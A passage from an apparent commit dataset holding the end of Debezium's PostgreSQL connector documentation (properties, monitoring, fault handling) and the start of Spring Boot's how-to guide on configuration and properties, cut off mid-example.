Allowed values depend on the configured plug-in.\nendif::community[]\n\n|[[postgresql-property-sanitize-field-names]]<<postgresql-property-sanitize-field-names, `+sanitize.field.names+`>>\n|`true` if connector configuration sets the `key.converter` or `value.converter` property to the Avro converter.\n\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[postgresql-property-slot-max-retries]]<<postgresql-property-slot-max-retries, `+slot.max.retries+`>>\n|`6`\n|If connecting to a replication slot fails, this is the maximum number of consecutive attempts to connect.\n\n|[[postgresql-property-slot-retry-delay-ms]]<<postgresql-property-slot-retry-delay-ms, `+slot.retry.delay.ms+`>> +\n|`10000` (10 seconds)\n|The number of milliseconds to wait between retry attempts when the connector fails to connect to a replication slot.\n\n|[[postgresql-property-toasted-value-placeholder]]<<postgresql-property-toasted-value-placeholder, `+toasted.value.placeholder+`>>\n|`__debezium_unavailable_value`\n|Specifies the constant that the connector provides to indicate that the original value is a toasted value that is not provided by the database.\nIf the setting of `toasted.value.placeholder` starts with the `hex:` prefix it is expected that the rest of the string represents hexadecimally encoded octets. See {link-prefix}:{link-postgresql-connector}#postgresql-toasted-values[toasted values] for additional details.\n\n|[[postgresql-property-provide-transaction-metadata]]<<postgresql-property-provide-transaction-metadata, `+provide.transaction.metadata+`>>\n|`false`\n|Determines whether the connector generates events with transaction boundaries and enriches change event envelopes with transaction metadata. Specify `true` if you want the connector to do this. See {link-prefix}:{link-postgresql-connector}#postgresql-transaction-metadata[Transaction metadata] for details.\n\n|[[postgresql-property-retriable-restart-connector-wait-ms]]<<postgresql-property-retriable-restart-connector-wait-ms, `+retriable.restart.connector.wait.ms+`>> +\n|10000 (10 seconds)\n|The number of milliseconds to wait before restarting a connector after a retriable error occurs.\n\n|===\n\n[id=\"postgresql-pass-through-properties\"]\n.Pass-through connector configuration properties\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer.\n\nBe sure to consult the {link-kafka-docs}.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. 
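\n\nFor illustration, the following sketch shows a connector registration that combines several of the properties described in the table above; the connection coordinates, connector name, and heartbeat statement are hypothetical values, not defaults:\n\n[source,json,indent=0]\n----\n\t{\n\t\t\"name\": \"fulfillment-connector\",\n\t\t\"config\": {\n\t\t\t\"connector.class\": \"io.debezium.connector.postgresql.PostgresConnector\",\n\t\t\t\"database.hostname\": \"192.168.99.100\",\n\t\t\t\"database.port\": \"5432\",\n\t\t\t\"database.user\": \"postgres\",\n\t\t\t\"database.password\": \"postgres\",\n\t\t\t\"database.dbname\": \"postgres\",\n\t\t\t\"database.server.name\": \"fulfillment\",\n\t\t\t\"heartbeat.interval.ms\": \"10000\",\n\t\t\t\"heartbeat.action.query\": \"INSERT INTO test_heartbeat_table (text) VALUES ('test_heartbeat')\",\n\t\t\t\"slot.retry.delay.ms\": \"10000\"\n\t\t}\n\t}\n----\n\n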
The PostgreSQL connector does use the {link-kafka-docs}.html#consumerconfigs[new consumer configuration properties].\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-performance\n\/\/ Title: Monitoring {prodname} PostgreSQL connector performance\n[[postgresql-monitoring]]\n== Monitoring\n\nThe {prodname} PostgreSQL connector provides two types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-postgresql-connector}#postgresql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-postgresql-connector}#postgresql-streaming-metrics[Streaming metrics] provide information about connector operation when the connector is capturing changes and streaming change event records.\n\n{link-prefix}:{link-debezium-monitoring}#monitoring-debezium[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-postgresql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of PostgreSQL databases\n[[postgresql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-postgresql-connector-record-streaming\n\/\/ Title: Monitoring {prodname} PostgreSQL connector record streaming\n[[postgresql-streaming-metrics]]\n=== Streaming metrics\n\nThe *MBean* is `debezium.postgres:type=connector-metrics,context=streaming,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\n\n\n\/\/ Type: reference\n\/\/ ModuleID: how-debezium-postgresql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} PostgreSQL connectors handle faults and problems\n[[postgresql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record.\n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. 
In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections:\n\n* xref:postgresql-connector-configuration-and-startup-errors[]\n* xref:postgresql-becomes-unavailable[]\n* xref:postgresql-cluster-failures[]\n* xref:postgresql-kafka-connect-process-stops-gracefully[]\n* xref:postgresql-kafka-connect-process-crashes[]\n* xref:postgresql-kafka-becomes-unavailable[]\n* xref:postgresql-connector-is-stopped-for-a-duration[]\nendif::product[]\n\n[id=\"postgresql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error\/exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to PostgreSQL by using the specified connection parameters.\n* The connector is restarting from a previously-recorded position in the PostgreSQL WAL (by using the LSN) and PostgreSQL no longer has that history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the PostgreSQL problem, restart the connector.\n\n[id=\"postgresql-becomes-unavailable\"]\n=== PostgreSQL becomes unavailable\n\nWhen the connector is running, the PostgreSQL server that it is connected to could become unavailable for any number of reasons. If this happens, the connector fails with an error and stops. When the server is available again, restart the connector.\n\nThe PostgreSQL connector externally stores the last processed offset in the form of a PostgreSQL LSN. After a connector restarts and connects to a server instance, the connector communicates with the server to continue streaming from that particular offset. This offset is available as long as the {prodname} replication slot remains intact. Never drop a replication slot on the primary server or you will lose data. See the next section for failure cases in which a slot has been removed.\n\n[id=\"postgresql-cluster-failures\"]\n=== Cluster failures\n\nAs of release 12, PostgreSQL allows logical replication slots _only on primary servers_. This means that you can point a {prodname} PostgreSQL connector to only the active primary server of a database cluster.\nAlso, replication slots themselves are not propagated to replicas.\nIf the primary server goes down, a new primary must be promoted.\n\nifdef::community[]\nThe new primary must have the {link-prefix}:{link-postgresql-connector}#installing-postgresql-output-plugin[logical decoding plug-in] installed and a replication slot that is configured for use by the plug-in and the database for which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::community[]\n\nifdef::product[]\nThe new primary must have a replication slot that is configured for use by the `pgoutput` plug-in and the database in which you want to capture changes. Only then can you point the connector to the new server and restart the connector.\nendif::product[]\n\nThere are important caveats when failovers occur and you should pause {prodname} until you can verify that you have an intact replication slot that has not lost data. 
After a failover:\n\n* There must be a process that re-creates the {prodname} replication slot before allowing the application to write to the *new* primary. This is crucial. Without this process, your application can miss change events.\n\n* You might need to verify that {prodname} was able to read all changes in the slot **before the old primary failed**.\n\nOne reliable method of recovering and verifying whether any changes were lost is to recover a backup of the failed primary to the point immediately before it failed. While this can be administratively difficult, it allows you to inspect the replication slot for any unconsumed changes.\n\nifdef::community[]\n\n[NOTE]\n====\nThere are discussions in the PostgreSQL community around a feature called `failover slots` that would help mitigate this problem, but as of PostgreSQL 12, they have not been implemented. However, there is active development for PostgreSQL 13 to support logical decoding on standbys, which is a major requirement to make failover possible. You can find more about this in this link:https:\/\/www.postgresql.org\/message-id\/CAJ3gD9fE=0w50sRagcs+jrktBXuJAWGZQdSTMa57CCY+Dh-xbg@mail.gmail.com[community thread].\n\nMore about the concept of failover slots is in link:http:\/\/blog.2ndquadrant.com\/failover-slots-postgresql[this blog post].\n====\nendif::community[]\n\n[id=\"postgresql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect process stops gracefully\n\nSuppose that Kafka Connect is being run in distributed mode and a Kafka Connect process is stopped gracefully. Prior to shutting down that process, Kafka Connect migrates the process's connector tasks to another Kafka Connect process in that group. The new connector tasks start processing exactly where the prior tasks stopped. There is a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n[id=\"postgresql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf the Kafka Connect process stops unexpectedly, any connector tasks it was running terminate without recording their most recently processed offsets. When Kafka Connect is being run in distributed mode, Kafka Connect restarts those connector tasks on other processes. However, PostgreSQL connectors resume from the last offset that was _recorded_ by the earlier processes. This means that the new replacement tasks might generate some of the same change events that were processed just prior to the crash. The number of duplicate events depends on the offset flush period and the volume of data changes just before the crash.\n\nBecause there is a chance that some events might be duplicated during a recovery from failure, consumers should always anticipate some duplicate events. {prodname} changes are idempotent, so a sequence of events always results in the same state.\n\nIn each change event record, {prodname} connectors insert source-specific information about the origin of the event, including the PostgreSQL server's time of the event, the ID of the server transaction, and the position in the write-ahead log where the transaction changes were written. Consumers can keep track of this information, especially the LSN, to determine whether an event is a duplicate.\n\n[id=\"postgresql-kafka-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka by using the Kafka producer API. 
Periodically, at a frequency that you specify in the Kafka Connect configuration, Kafka Connect records the latest offset that appears in those change events. If the Kafka brokers become unavailable, the Kafka Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"postgresql-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the PostgreSQL WAL. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in PostgreSQL.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3c761cfc966b8c944eff63773e6ebfd0dd9f573a","subject":"Polish 'Database Initialization' section","message":"Polish 'Database Initialization' section\n\nSee gh-15859\n","repos":"spring-projects\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,philwebb\/spring-boot,scottfrederick\/spring-boot,shakuzen\/spring-boot,wilkinsona\/spring-boot,eddumelendez\/spring-boot,lburgazzoli\/spring-boot,joshiste\/spring-boot,jxblum\/spring-boot,jxblum\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,tiarebalbi\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,rweisleder\/spring-boot,eddumelendez\/spring-boot,wilkinsona\/spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,ilayaperumalg\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,lburgazzoli\/spring-boot,mdeinum\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,aahlenst\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,aahlenst\/spring-boot,shakuzen\/spring-boot,rweisleder\/spring-boot,hello2009chen\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,yangdd1205\/spring-boot,joshiste\/spring-boot,eddumelendez\/spring-boot,aahlenst\/spring-boot,joshiste\/spring-boot,aahlenst\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,yangdd1205\/spring-boot,scottfrederick\/spring-boot,jxblum\/spring-boot,wilkinsona\/spring-boot,Buzzardo\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,Buzzardo\/spring-boot,shakuzen\/spring-boot,aahlenst\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,rweisleder\/spring-boot,royclarkson\/spring-boot,htynkn\/spring-boot,ilayaperumalg\/spring-boot,scottfrederick\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,eddumelendez\/spring-boot
,spring-projects\/spring-boot,shakuzen\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,Buzzardo\/spring-boot,NetoDevel\/spring-boot,htynkn\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,yangdd1205\/spring-boot,ilayaperumalg\/spring-boot,dreis2211\/spring-boot,royclarkson\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,donhuvy\/spring-boot,dreis2211\/spring-boot,ilayaperumalg\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,donhuvy\/spring-boot,spring-projects\/spring-boot,jxblum\/spring-boot,kdvolder\/spring-boot,shakuzen\/spring-boot,royclarkson\/spring-boot,jxblum\/spring-boot,hello2009chen\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,vpavic\/spring-boot,NetoDevel\/spring-boot,NetoDevel\/spring-boot,ilayaperumalg\/spring-boot,philwebb\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,NetoDevel\/spring-boot,tiarebalbi\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,eddumelendez\/spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,Buzzardo\/spring-boot,kdvolder\/spring-boot,vpavic\/spring-boot,scottfrederick\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,mbenson\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,joshiste\/spring-boot,mbenson\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,htynkn\/spring-boot,joshiste\/spring-boot,mdeinum\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/main\/asciidoc\/howto.adoc","new_contents":"[[howto]]\n= '`How-to`' guides\n\n[partintro]\n--\nThis section provides answers to some common '`how do I do that...`' questions\nthat often arise when using Spring Boot. Its coverage is not exhaustive, but it\ndoes cover quite a lot.\n\nIf you have a specific problem that we do not cover here, you might want to check out\nhttps:\/\/stackoverflow.com\/tags\/spring-boot[stackoverflow.com] to see if someone has\nalready provided an answer. This is also a great place to ask new questions (please use\nthe `spring-boot` tag).\n\nWe are also more than happy to extend this section. If you want to add a '`how-to`',\nsend us a {github-code}[pull request].\n--\n\n\n\n[[howto-spring-boot-application]]\n== Spring Boot Application\n\nThis section includes topics relating directly to Spring Boot applications.\n\n\n\n[[howto-failure-analyzer]]\n=== Create Your Own FailureAnalyzer\n{dc-spring-boot}\/diagnostics\/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way\nto intercept an exception on startup and turn it into a human-readable message, wrapped\nin a {dc-spring-boot}\/diagnostics\/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring\nBoot provides such an analyzer for application-context-related exceptions, JSR-303\nvalidations, and more. You can also create your own.\n\n`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks the\npresence of a specified exception type in the exception to handle. You can extend from\nthat so that your implementation gets a chance to handle the exception only when it is\nactually present. 
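\n\nFor example, the following is a minimal sketch of such an analyzer (the `ProjectConstraintViolationException` type is a hypothetical application exception):\n\n[source,java,indent=0]\n----\n\tpublic class ProjectConstraintViolationFailureAnalyzer\n\t\t\textends AbstractFailureAnalyzer<ProjectConstraintViolationException> {\n\n\t\t@Override\n\t\tprotected FailureAnalysis analyze(Throwable rootFailure,\n\t\t\t\tProjectConstraintViolationException cause) {\n\t\t\t\/\/ ProjectConstraintViolationException is a hypothetical application exception\n\t\t\treturn new FailureAnalysis(\"A project constraint was violated: \"\n\t\t\t\t\t+ cause.getMessage(), \"Review the project constraints and try again.\", cause);\n\t\t}\n\n\t}\n----\n\n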
If, for whatever reason, you cannot handle the exception, return `null`\nto give another implementation a chance to handle the exception.\n\n`FailureAnalyzer` implementations must be registered in `META-INF\/spring.factories`.\nThe following example registers `ProjectConstraintViolationFailureAnalyzer`:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.diagnostics.FailureAnalyzer=\\\n\tcom.example.ProjectConstraintViolationFailureAnalyzer\n----\n\nNOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`\ncan simply implement `BeanFactoryAware` or `EnvironmentAware` respectively.\n\n\n\n[[howto-troubleshoot-auto-configuration]]\n=== Troubleshoot Auto-configuration\nThe Spring Boot auto-configuration tries its best to \"`do the right thing`\", but\nsometimes things fail, and it can be hard to tell why.\n\nThere is a really useful `ConditionEvaluationReport` available in any Spring Boot\n`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use\nthe `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),\nthere is also a `conditions` endpoint that renders the report in JSON. Use that endpoint\nto debug the application and see what features have been added (and which have not been\nadded) by Spring Boot at runtime.\n\nMany more questions can be answered by looking at the source code and the Javadoc. When\nreading the code, remember the following rules of thumb:\n\n* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special\nattention to the `+@Conditional*+` annotations to find out what features they enable and\nwhen. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the\nconsole of all the auto-configuration decisions that were made in your app. In a running\nActuator app, look at the `conditions` endpoint (`\/actuator\/conditions` or the JMX\nequivalent) for the same information.\n* Look for classes that are `@ConfigurationProperties` (such as\n{sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[`ServerProperties`])\nand read from there the available external configuration options. The\n`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to\nexternal properties. Thus, `ServerProperties` has `prefix=\"server\"` and its configuration\nproperties are `server.port`, `server.address`, and others. In a running Actuator app,\nlook at the `configprops` endpoint.\n* Look for uses of the `bind` method on the `Binder` to pull configuration values\nexplicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.\n* Look for `@Value` annotations that bind directly to the `Environment`.\n* Look for `@ConditionalOnExpression` annotations that switch features on and off in\nresponse to SpEL expressions, normally evaluated with placeholders resolved from the\n`Environment`.\n\n\n\n[[howto-customize-the-environment-or-application-context]]\n=== Customize the Environment or ApplicationContext Before It Starts\nA `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that\nare used to apply customizations to the context or environment. Spring Boot loads a number\nof such customizations for use internally from `META-INF\/spring.factories`. 
There is more\nthan one way to register additional customizations:\n\n* Programmatically, per application, by calling the `addListeners` and `addInitializers`\nmethods on `SpringApplication` before you run it.\n* Declaratively, per application, by setting the `context.initializer.classes` or\n`context.listener.classes` properties.\n* Declaratively, for all applications, by adding a `META-INF\/spring.factories` and packaging\na jar file that the applications all use as a library.\n\nThe `SpringApplication` sends some special `ApplicationEvents` to the listeners (some\neven before the context is created) and then registers the listeners for events published\nby the `ApplicationContext` as well. See\n\"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`\" in the\n'`Spring Boot features`' section for a complete list.\n\nIt is also possible to customize the `Environment` before the application context is\nrefreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in\n`META-INF\/spring.factories`, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\torg.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor\n----\n\nThe implementation can load arbitrary files and add them to the `Environment`. For\ninstance, the following example loads a YAML configuration file from the classpath:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/context\/EnvironmentPostProcessorExample.java[tag=example]\n----\n\nTIP: The `Environment` has already been prepared with all the usual property sources\nthat Spring Boot loads by default. It is therefore possible to get the location of the\nfile from the environment. The preceding example adds the `custom-resource` property\nsource at the end of the list so that a key defined in any of the usual other locations\ntakes precedence. A custom implementation may define another order.\n\nCAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a\nconvenient and easy way to load a custom resource in the `Environment`, we do not\nrecommend it, because Spring Boot prepares the `Environment` before the\n`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too\nlate to have any effect on auto-configuration.\n\n\n\n[[howto-build-an-application-context-hierarchy]]\n=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)\nYou can use the `SpringApplicationBuilder` class to create parent\/child `ApplicationContext`\nhierarchies. See \"`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`\"\nin the '`Spring Boot features`' section for more information.\n\n\n\n[[howto-create-a-non-web-application]]\n=== Create a Non-web Application\nNot all Spring applications have to be web applications (or web services). If you want to\nexecute some code in a `main` method but also bootstrap a Spring application to set up\nthe infrastructure to use, you can use the `SpringApplication` features of Spring\nBoot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether\nit thinks it needs a web application or not. The first thing you can do to help it is to\nleave server-related dependencies (such as the servlet API) off the classpath. 
If you cannot do\nthat (for example, you run two applications from the same code base) then you can\nexplicitly call `setWebApplicationType(WebApplicationType.NONE)` on your\n`SpringApplication` instance or set the `applicationContextClass` property (through the\nJava API or with external properties). Application code that you want to run as your\nbusiness logic can be implemented as a `CommandLineRunner` and dropped into the context as\na `@Bean` definition.\n\n\n\n[[howto-properties-and-configuration]]\n== Properties and Configuration\n\nThis section includes topics about setting and reading properties and configuration\nsettings and their interaction with Spring Boot applications.\n\n[[howto-automatic-expansion]]\n=== Automatically Expand Properties at Build Time\nRather than hardcoding some properties that are also specified in your project's build\nconfiguration, you can automatically expand them by instead using the existing build\nconfiguration. This is possible in both Maven and Gradle.\n\n\n\n[[howto-automatic-expansion-maven]]\n==== Automatic Property Expansion Using Maven\nYou can automatically expand properties from the Maven project by using resource\nfiltering. If you use the `spring-boot-starter-parent`, you can then refer to your\nMaven '`project properties`' with `@..@` placeholders, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\tapp.encoding=@project.build.sourceEncoding@\n\tapp.java.version=@java.version@\n----\n\nNOTE: Only production configuration is filtered that way (in other words, no filtering is\napplied on `src\/test\/resources`).\n\nTIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add\n`src\/main\/resources` directly to the classpath (for hot reloading purposes). Doing so\ncircumvents the resource filtering and this feature. Instead, you can use the `exec:java`\ngoal or customize the plugin's configuration. See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `${placeholder}`) in your configuration. 
If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. For example, in\n`application.properties`, you might have the following settings:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.web-application-type=none\n\tspring.main.banner-mode=off\n----\n\nThen the Spring Boot banner is not printed on startup, and the application is not starting\nan embedded web server.\n\nProperties defined in external configuration override the values specified with the Java\nAPI, with the notable exception of the sources used to create the `ApplicationContext`.\nConsider the following application:\n\n[source,java,indent=0]\n----\n\tnew SpringApplicationBuilder()\n\t\t.bannerMode(Banner.Mode.OFF)\n\t\t.sources(demo.MyApp.class)\n\t\t.run(args);\n----\n\nNow consider the following configuration:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring.main.sources=com.acme.Config,com.acme.ExtraConfig\n\tspring.main.banner-mode=console\n----\n\nThe actual application _now_ shows the banner (as overridden by configuration) and uses\nthree sources for the `ApplicationContext` (in the following order): `demo.MyApp`,\n`com.acme.Config`, and `com.acme.ExtraConfig`.\n\n\n\n[[howto-change-the-location-of-external-properties]]\n=== Change the Location of External Properties of an Application\nBy default, properties from different sources are added to the Spring `Environment` in a\ndefined order (see \"`<<spring-boot-features.adoc#boot-features-external-config>>`\" in\nthe '`Spring Boot features`' section for the exact order).\n\nA nice way to augment and modify this ordering is to add `@PropertySource` annotations to your\napplication sources. Classes passed to the `SpringApplication` static convenience\nmethods and those added using `setSources()` are inspected to see if they have\n`@PropertySources`. If they do, those properties are added to the `Environment` early\nenough to be used in all phases of the `ApplicationContext` lifecycle. 
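\n\nFor example, the following sketch adds a property source to an application class (the `custom.properties` resource is hypothetical):\n\n[source,java,indent=0]\n----\n\t@SpringBootApplication\n\t\/\/ \"custom.properties\" is a hypothetical resource on the classpath\n\t@PropertySource(\"classpath:custom.properties\")\n\tpublic class MyApplication {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication.run(MyApplication.class, args);\n\t\t}\n\n\t}\n----\n\n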
Properties added\nin this way have lower priority than any added by using the default locations (such as\n`application.properties`), system properties, environment variables, or the command line.\n\nYou can also provide the following System properties (or environment variables) to change\nthe behavior:\n\n* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of\nthe file name.\n* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a\nclasspath resource or a URL). A separate `Environment` property source is set up for this\ndocument and it can be overridden by system properties, environment variables, or the\ncommand line.\n\nNo matter what you set in the environment, Spring Boot always loads\n`application.properties` as described above. By default, if YAML is used, then files with\nthe '`.yml`' extension are also added to the list.\n\nSpring Boot logs the configuration files that are loaded at the `DEBUG` level and the\ncandidates it has not found at `TRACE` level.\n\nSee {sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]\nfor more detail.\n\n\n\n[[howto-use-short-command-line-arguments]]\n=== Use '`Short`' Command Line Arguments\nSome people like to use (for example) `--port=9000` instead of `--server.port=9000` to\nset configuration properties on the command line. You can enable this behavior by using\nplaceholders in `application.properties`, as shown in the following example:\n\n[source,properties,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver.port=${port:8080}\n----\n\nTIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter\ntoken of the `maven-resources-plugins` has been changed from `+${*}+` to `@` (that is,\n`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style\nplaceholders. If you have enabled Maven filtering for the `application.properties`\ndirectly, you may want to also change the default filter token to use\nhttps:\/\/maven.apache.org\/plugins\/maven-resources-plugin\/resources-mojo.html#delimiters[other\ndelimiters].\n\nNOTE: In this specific case, the port binding works in a PaaS environment such as Heroku\nor Cloud Foundry. In those two platforms, the `PORT` environment variable is set\nautomatically and Spring can bind to capitalized synonyms for `Environment` properties.\n\n\n\n[[howto-use-yaml-for-external-properties]]\n=== Use YAML for External Properties\nYAML is a superset of JSON and, as such, is a convenient syntax for storing external\nproperties in a hierarchical format, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tspring:\n\t\tapplication:\n\t\t\tname: cruncher\n\t\tdatasource:\n\t\t\tdriverClassName: com.mysql.jdbc.Driver\n\t\t\turl: jdbc:mysql:\/\/localhost\/test\n\tserver:\n\t\tport: 